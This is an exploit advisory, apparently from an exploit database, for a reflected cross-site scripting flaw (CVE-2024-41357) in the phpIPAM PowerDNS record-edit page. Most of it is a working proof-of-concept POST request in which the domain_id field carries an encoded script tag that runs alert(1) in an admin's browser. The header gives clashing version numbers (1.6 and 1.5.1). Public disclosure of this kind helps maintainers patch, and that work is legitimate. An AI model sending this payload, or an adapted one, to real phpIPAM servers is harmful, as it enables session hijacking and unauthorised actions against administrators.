# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2024-41357 Proof Of Concept # PoC to trigger XSS vulnerability in phpipam 1.6 # Ensure you are logged in as an admin user to satisfy the admin check condition. # Send the following POST request to trigger the XSS vulnerability: POST /app/admin/powerDNS/record-edit.php HTTP/1.1 Host: phpipam Content-Type: application/x-www-form-urlencoded Content-Length: action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E # This will execute the alert(1) script when the response is rendered in the browser.